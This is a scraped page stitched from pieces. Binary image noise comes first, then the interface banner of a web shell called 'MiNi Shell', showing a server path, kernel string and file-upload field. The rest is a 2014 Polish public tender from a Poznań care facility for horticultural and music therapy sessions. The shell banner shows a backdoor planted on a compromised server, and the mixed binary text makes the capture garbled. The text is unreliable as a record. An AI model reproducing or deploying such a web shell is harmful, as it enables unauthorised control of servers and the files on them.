JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141128/391712-N-2014.html

<p class="kh_header"><b>Poznań: Przeprowadzenie terapii zajęciowej w ramach projektu Poprawa jakości opieki nad osobami niesamodzielnymi, z zaburzeniami psychicznymi i niepełnosprawnymi intelektualnie - Filia ZOLiRM w Owińskach dofinansowanego z Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego i Norweskiego Mechanizmu Finansowego 2009-2014 w ramach Programu Operacyjnego PL07 Poprawa i lepsze dostosowanie ochrony zdrowia do trendów demograficzno-epidemiologicznych</b><br>
<b>Numer ogłoszenia: 391712 - 2014; data zamieszczenia: 28.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Opiekuńczo-Leczniczy i Rehabilitacji Medycznej, Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Mogileńska 42, 61-044 Poznań, woj. wielkopolskie, tel. 0-61 8738702, 8738715, faks 0-61 8738703.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mogilenska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie terapii zajęciowej w ramach projektu Poprawa jakości opieki nad osobami niesamodzielnymi, z zaburzeniami psychicznymi i niepełnosprawnymi intelektualnie - Filia ZOLiRM w Owińskach dofinansowanego z Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego i Norweskiego Mechanizmu Finansowego 2009-2014 w ramach Programu Operacyjnego PL07 Poprawa i lepsze dostosowanie ochrony zdrowia do trendów demograficzno-epidemiologicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie terapii zajęciowej w ramach projektu Poprawa jakości opieki nad osobami niesamodzielnymi, z zaburzeniami psychicznymi i niepełnosprawnymi intelektualnie - Filia ZOLiRM w Owińskach dofinansowanego z Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego i Norweskiego Mechanizmu Finansowego 2009-2014 w ramach Programu Operacyjnego PL07 Poprawa i lepsze dostosowanie ochrony zdrowia do trendów demograficzno-epidemiologicznych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania wiedzy i doświadczenia, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i finansowej, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia oraz wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na łączną kwotę równą co najmniej 100 000,00 PLN dla każdej z części oddzielnie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (prowadzić zajęcia), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - załącznik nr 3 - dotyczy każdego zadania;
wykaz narzędzi i urządzeń, które będą użyte do realizacji terapii - dotyczy każdego zadania;
wykaz ukończonych kurów, szkoleń, szkół, w celu oceny kompetencji zawodowych - załącznik nr 10.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Kompetnecje zawodowe - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień umowy zawartej z wybranym Wykonawcą w następujących przypadkach:
a) zmiana terminu wykonania usługi - w wyniku zmiany będącej następstwem okoliczności leżących po stronie Zamawiającego;
b) gdy zmianie ulegnie urzędowa stawka podatku VAT - Zamawiający dopuszcza możliwość zmiany wartości wynagrodzenia umownego;
c) gdy zmianie ulegnie sposób rozliczania umów zlecenia, wpływający na wysokość wynagrodzenia Wykonawcy w szczególności dotyczących obowiązku odprowadzania składek do ZUS od wszelkich umów zleceń do wysokości minimalnego wynagrodzenia za pracę - Zamawiający pokryje dodatkowe koszty związane ze zmianą przepisów prawa w tym zakresie;
d) zmiana osób wskazanych w ofercie, które będą uczestniczyć w wykonywaniu zamówienia, na inne osoby pod warunkiem, że nowe osoby będą spełniać wymagania (warunki) opisane dla tej osoby w specyfikacji istotnych warunków zamówienia w postępowaniu o udzielenie zamówienia publicznego;
e) gdy zmiany będą nieistotne lub korzystne dla Zamawiającego i nie będą:
 - wprowadzane warunki, które gdyby zostały ujęte w ramach procedury przetargowej udzielenia zamówienia umożliwiłyby dopuszczenie innych ofert niż ta, która została pierwotnie dopuszczona;
 - modyfikowały równowagi ekonomicznej umowy na korzyść Wykonawcy w sposób, który nie był przewidziany w postanowieniach pierwotnego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> mogilenska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Zakładzie Opiekuńczo - Leczniczym i Rehabilitacji Medycznej Samodzielnym Publicznym Zakładzie Opieki Zdrowotnej, Poznań 61-044, ul. Mogileńska 42, w sekretariacie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2014 godzina 13:45, miejsce: w Zakładzie Opiekuńczo - Leczniczym i Rehabilitacji Medycznej Samodzielnym Publicznym Zakładzie Opieki Zdrowotnej, Poznań 61-044, ul. Mogileńska 42, w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZAJĘCIA TERAPEUTYCZNE Z HORTICULOTERAPII Z ELEMENTAMI ARTETERAPII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GŁÓWNE ZADANIA OSOBY PROWADZĄCEJ ZAJĘCIA
1. Organizacja i prowadzenie grupowych (20 osób) zajęć terapeutycznych dla osób niesamodzielnych, niepełnosprawnych intelektualnie i z zaburzeniami psychicznymi zgodnie z załączonym szczegółowym programem działań (Załącznik nr 5  Str. 11-42).
2. W ramach organizacji zajęć prowadzący zajęcia zobowiązany jest do zakupu wszystkich materiałów niezbędnych do ich prawidłowego poprowadzenia, wymienionych w załączonym Załączniku nr 6  Zestawienie ilości materiałów niezbędnych do realizacji programu działań terapeutycznych z Horticuloterapii w okresie 12.2014 - 04.2016 oraz ich dostarczenia do miejsca odbywania zajęć. Zamawiający wymaga, aby wymienione materiały były zapewnione w takiej ilości i asortymencie, aby pozwalały  każdemu z pacjentów aktywnie uczestniczyć w zajęciach. Jednocześnie Zamawiający zaznacza, że nie wymaga przy rozpoczynaniu każdego bloku zajęć dostarczenia zakupionego na nowo asortymentu. Jeżeli wcześniej zakupione materiały nie zostały zużyte i wciąż nadają się do dalszego użytkowania w toku dalszych zajęć nadal mogą być używane (np. kredki, farby itp.)
3. Realizacja założonych celów zajęć
4. Motywowanie uczestników do aktywnego udziału w zajęciach
5. Odpowiedzialność za zapewnienie bezpieczeństwa pacjentów podczas prowadzenia zajeć.
6. Współpraca z koordynatorem, asystentem koordynatora projektu ds. działań nieinwestycyjnych oraz  z pracownikami Oddziału w zakresie organizacji zajęć oraz we wszystkich innych obszarach związanych z realizacją działania.
7. Prowadzenie dokumentacji indywidualnej pacjenta w powierzonym zakresie, w tym dokumentacji potwierdzającej uczestnictwo pacjenta w zajęciach. 
8. Współpraca z osobami prowadzącymi nadzór autorski w zakresie prowadzonych działań ewaluacyjnych.
9. Informowanie koordynatora projektu na bieżąco o wszystkich zaistniałych problemach w realizacji zajęć, terminowe przygotowywanie wszystkich wymaganych dokumentów, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji oraz innych obowiązujących dokumentów 
10. Przechowywanie danych osobowych uczestników projektu z zachowaniem przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych i aktów wykonywanych do ww. ustawy. 

CZAS, MIEJSCE, WARUNKI ŚWIADCZENIA USŁUG 
1. Umowa  wykonawcą (prowadzącym zajęcia) zostanie zawarta na okres od jej podpisania do dnia 15.04.2016r.
2. Wykonawca będzie realizował powierzony zakres zajęć terapeutycznych w wyznaczonym dniu tygodnia (od poniedziałku do piątku)  w godz. 9.00:13.00 i w tym okresie czasowym każdy z wykonawców musi pozostawać w dyspozycji dla Zamawiającego. Proponowane termin zajęć to środa. Dokładny dzień tygodnia, w którym będą prowadzone zajęcia zostanie uzgodniony przed rozpoczęciem zajęć. 
3. Planowana ilość godzin pracy terapeutycznej dla prowadzącego zajęcia terapeutyczne z horticuloterapii z elementami innych terapii to zajęcia grupowe 1 x w tygodniu x 4 godziny tj. średnio 16 godzin w miesiącu x 17 miesięcy co daje 272 godziny w czasie trwania umowy.
4. Rozliczenie czasu pracy nastąpi na podstawie na podstawie kart czasu pracy. Wykonawca otrzyma wynagrodzenie za czas pracy podczas zajęć faktycznie zrealizowanych.
5. Czasu dojazdu do siedziby Zamawiającego oraz w inne miejsca związane z realizacją zadania nie wlicza się do rozliczenia godzin pracy.
6. Miejscem realizacji programu jest Oddział Opiekuńczo-Leczniczy Psychiatryczny w Owińskach, ul. Cysterek 5, który będzie też głównym miejscem zajęć terapeutycznych realizowanych w ramach programu.
7. Do wykonania zamówienia Wykonawca powinien dysponować wszystkimi materiałami niezbędnymi do ich wykonania w ilości zapewniającej sprawną i zgodną ze szczegółowym programem działań realizację zajęć.
8. Przed rozpoczęciem zajęć nastąpi weryfikacja ilości i jakości dostarczonych przez Wykonawcę materiałów przeznaczonych do prawidłowego przeprowadzenia zajęć. W razie braku wystarczającej ilości materiałów Zamawiający wstrzyma prowadzenie zajęć do momenty zapewnienia pełnego uczestnictwa wszystkim pacjentom. 
Godzina rozpoczęcia zajęć liczona jest od momentu zaakceptowania przez Zamawiającego pełnej gotowości Wykonawcy do prowadzenia zajęć (w takich sytuacjach dopuszcza się możliwość zmniejszenia wynagrodzenia Wykonawcy do faktycznej ilości przepracowanych godzin lub wydłużenia czasu prowadzonych zajęć do pełnej liczby godzin konieczny do realizowania pełnego zakresu prowadzonych zajęć).
9. ZOLiRM zapewnia sprzęt do wykonania zajęć typu; komputery, projektor, aparaty fotograficzne, kamery, sprzęt odtwarzający i nagrywający muzykę, sprzęt nagłaśniający, sprzęt muzyczny, oświetlenie, kurtyny, ekran, muzykę do odtwarzania na płytach CD zgodnie z przyjętymi w scenariuszach założeniami. Obowiązkiem Wykonawcy jest właściwe użytkowanie powierzonego do prowadzenia zajęć sprzętu. 
10. Nie przewiduje się żadnych dodatkowych opłat za wykonanie usługi. 

WYMAGANIA WOBEC WYKONAWCY (PROWADZĄCEGO ZAJĘCIA)
Bezwzględnie wymagane
1. Wykształcenie i kwalifikacje umożliwiające wykonywanie pracy terapeutycznej - co najmniej 2 elementy spośród niżej wymienionych:
a) wykształcenie zawodowe terapeuty zajęciowego
b) wykształcenie wyższe, co najmniej na poziomie licencjatu
c) studia podyplomowe z zakresu arteterapii
d) kurs, szkolenie z zakresu arteterapii
2. Co najmniej 1-roczne doświadczenie w pracy terapeutycznej (Zamawiający dopuszcza doświadczenie wynikające z realizacji umów o pracę, cywilnoprawnych, staży, wolontariatu, praktyk itp.)
3. Dyspozycyjność w zakresie czasu pracy opisanego w punkcie (Czas, miejsce, warunki świadczenia usług).
Wymagania dodatkowe poddawane ocenie 
1. Udokumentowane doświadczenie w pracy terapeutycznej z osobami niepełnosprawnymi intelektualnie i z zaburzeniami psychicznymi (Zamawiający dopuszcza doświadczenie wynikające z realizacji umów o pracę, cywilnoprawnych, staży wolontariatu, praktyk itp.) 
2. Ukończone (lub w trakcie realizacji) kursy i szkolenia tematycznie powiązane z terapią lub problemami osób, które są podmiotem działań terapeutycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Kompetnecje zawodowe - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZAJĘCIA TERAPEUTYCZNE Z MUZYKOTERAPII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GŁÓWNE ZADANIA OSOBY PROWADZĄCEJ ZAJĘCIA
1. Organizacja i prowadzenie grupowych (10 - 12 osób) i indywidualnych (8 osób) zajęć terapeutycznych dla osób niesamodzielnych, niepełnosprawnych intelektualnie i z zaburzeniami psychicznymi zgodnie z załączonym szczegółowym programem działań (Załącznik nr 5 str. 43-100).
2. W ramach organizacji zajęć prowadzący zajęcia zobowiązany jest do zakupu wszystkich materiałów niezbędnych do ich prawidłowego poprowadzenia, wymienionych w załączonym Załączniku nr 7 Zestawienie ilości materiałów niezbędnych do realizacji programu działań terapeutycznych z Muzykoterapii w okresie grudzień 2014 - kwiecień 2016 oraz ich dostarczenia do miejsca odbywania zajęć. Zamawiający wymaga, aby wymienione materiały były zapewnione w takiej ilości i asortymencie, aby pozwalały  każdemu z pacjentów aktywnie uczestniczyć w zajęciach. Jednocześnie Zamawiający zaznacza, że nie wymaga przy rozpoczynaniu każdego bloku zajęć dostarczenia zakupionego na nowo asortymentu. Jeżeli wcześniej zakupione materiały nie zostały zużyte i wciąż nadają się do dalszego użytkowania w toku dalszych zajęć nadal mogą być używane (np. kredki, farby itp.)
3. Realizacja założonych celów zajęć
4. Motywowanie uczestników do aktywnego udziału w zajęciach
5. Odpowiedzialność za zapewnienie bezpieczeństwa pacjentów podczas prowadzenia zajęć.
6. Współpraca z koordynatorem, asystentem koordynatora projektu ds. działań nieinwestycyjnych oraz  z pracownikami Oddziału w zakresie organizacji zajęć oraz we wszystkich innych obszarach związanych z realizacją działania.
7. Prowadzenie dokumentacji indywidualnej pacjenta w powierzonym zakresie w tym dokumentacji potwierdzającej uczestnictwo pacjenta w zajęciach .   
8. Współpraca z osobami prowadzącymi nadzór autorski w zakresie prowadzonych działań ewaluacyjnych.
9. Informowanie koordynatora projektu na bieżąco o wszystkich zaistniałych problemach w realizacji zajęć, terminowe przygotowywanie wszystkich wymaganych dokumentów, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji oraz innych obowiązujących dokumentów 
10. Przechowywanie danych osobowych uczestników projektu z zachowaniem przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych i aktów wykonywanych do ww. ustawy. 

CZAS, MIEJSCE, WARUNKI ŚWIADCZENIA USŁUG 
1. Umowa  z wykonawcą (prowadzącym zajęcia) zostanie zawarta na okres od jej podpisania do dnia 15.04.2016r.
2. Wykonawca będzie realizował powierzony zakres zajęć terapeutycznych w wyznaczonym dniu tygodnia (od poniedziałku do piątku) w godz. 9.00 - 14.00 i w tym okresie czasowym każdy z wykonawców musi pozostawać w dyspozycji dla Zamawiającego. 
Proponowany termin zajęć to wtorek. Dokładny dzień tygodnia, w którym będą prowadzone zajęcia zostanie uzgodniony przed rozpoczęciem zajęć. 
3. Planowana ilość godzin pracy terapeutycznej dla prowadzącego zajęcia terapeutyczne z muzykoterapii to:
a) zajęcia grupowe 1 x w tygodniu x 2 godziny tj. średnio 16 godzin w miesiącu X 17 miesięcy =136 godziny w całej umowie
b) zajęcia indywidualne 34 godziny na jednego pacjenta x 8 pacjentów  = 272 godziny w całej umowie.
Zamawiający dopuszcza przesunięcia godzinowe pomiędzy rodzajami zajęć grupowymi i indywidualnymi, które wynikają z rodzących się potrzeb w toku prowadzenia zajęć.
4. Rozliczenie czasu pracy nastąpi na podstawie na podstawie kart czasu pracy. Wykonawca otrzyma wynagrodzenie za czas pracy podczas zajęć faktycznie zrealizowanych.
5. Czasu dojazdu do siedziby Zamawiającego oraz w inne miejsca związane z realizacją zadania nie wlicza się do rozliczenia godzin pracy.
6. Miejscem realizacji programu jest Oddział Opiekuńczo-Leczniczy Psychiatryczny w Owińskach, ul. Cysterek 5, który będzie też głównym miejscem zajęć terapeutycznych realizowanych w ramach programu.
7. Do wykonania zamówienia Wykonawca powinien dysponować wszystkimi materiałami niezbędnymi do ich wykonania w ilości zapewniającej sprawną i zgodną ze szczegółowym programem działań realizację zajęć.
8. Przed rozpoczęciem zajęć nastąpi weryfikacja ilości i jakości dostarczonych przez Wykonawcę materiałów przeznaczonych do prawidłowego przeprowadzenia zajęć. W razie braku wystarczającej ilości materiałów Zamawiający wstrzyma prowadzenie zajęć do momenty zapewnienia pełnego uczestnictwa wszystkim pacjentom. Godzina rozpoczęcia zajęć liczona jest od momentu zaakceptowania przez Zamawiającego pełnej gotowości Wykonawcy do prowadzenia zajęć (w takich sytuacjach dopuszcza się możliwość zmniejszenia wynagrodzenia Wykonawcy do faktycznej ilości przepracowanych godzin lub wydłużenia czasu prowadzonych zajęć do pełnej liczby godzin konieczny do realizowania pełnego zakresu prowadzonych zajęć).
